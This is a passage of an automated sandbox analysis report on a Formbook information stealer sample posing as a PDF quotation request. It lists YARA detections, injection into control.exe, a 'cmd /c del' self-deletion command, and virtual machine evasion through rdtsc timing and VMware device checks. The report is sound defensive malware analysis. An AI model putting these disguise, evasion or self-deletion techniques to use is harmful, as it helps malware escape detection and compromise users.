          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A92EF72_2_00A92EF7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E6E302_2_009E6E30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8D6162_2_00A8D616
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91FF12_2_00A91FF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9DFCE2_2_00A9DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A841F7_2_047A841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D4667_2_0485D466
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04790D207_2_04790D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048625DD7_2_048625DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862D077_2_04862D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E07_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861D557_2_04861D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C25817_2_047C2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B6E307_2_047B6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862EF77_2_04862EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485D6167_2_0485D616
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486DFCE7_2_0486DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861FF17_2_04861FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048620A87_2_048620A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048628EC7_2_048628EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048510027_2_04851002
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486E8247_2_0486E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A07_2_047C20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AB0907_2_047AB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B41207_2_047B4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479F9007_2_0479F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048622AE7_2_048622AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485DBD27_2_0485DBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048503DA7_2_048503DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04862B287_2_04862B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CEBB07_2_047CEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00708C507_2_00708C50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00708C4B7_2_00708C4B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071C5A17_2_0071C5A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702D907_2_00702D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702D877_2_00702D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00702FB07_2_00702FB0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: String function: 009CB150 appears 45 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0479B150 appears 39 times
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@17/8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsp8287.tmpJump to behavior
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeVirustotal: Detection: 35%
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'Jump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041D067 push ss; ret 2_2_0041D06D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004152DB push esi; rep ret 2_2_004152EA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0040AB63 push esi; iretd 2_2_0040AB67
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3FB push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041B45C push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00414DEF push ss; iretd 2_2_00414DF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041C597 push esi; ret 2_2_0041C599
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_0041CE86 push esi; iretd 2_2_0041CE89
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00414F7F push FFFFFF97h; iretd 2_2_00414FBC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A1D0D1 push ecx; ret 2_2_00A1D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047ED0D1 push ecx; ret 7_2_047ED0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071D067 push ss; ret 7_2_0071D06D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_007152DB push esi; rep ret 7_2_007152EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0070AB63 push esi; iretd 7_2_0070AB67
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3F2 push eax; ret 7_2_0071B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3FB push eax; ret 7_2_0071B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B3A5 push eax; ret 7_2_0071B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071B45C push eax; ret 7_2_0071B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00714DEF push ss; iretd 7_2_00714DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071C597 push esi; ret 7_2_0071C599
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0071CE86 push esi; iretd 7_2_0071CE89
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00714F7F push FFFFFF97h; iretd 7_2_00714FBC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dllJump to dropped file
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Windows\explorer.exe TID: 6872Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 6776Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmpBinary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
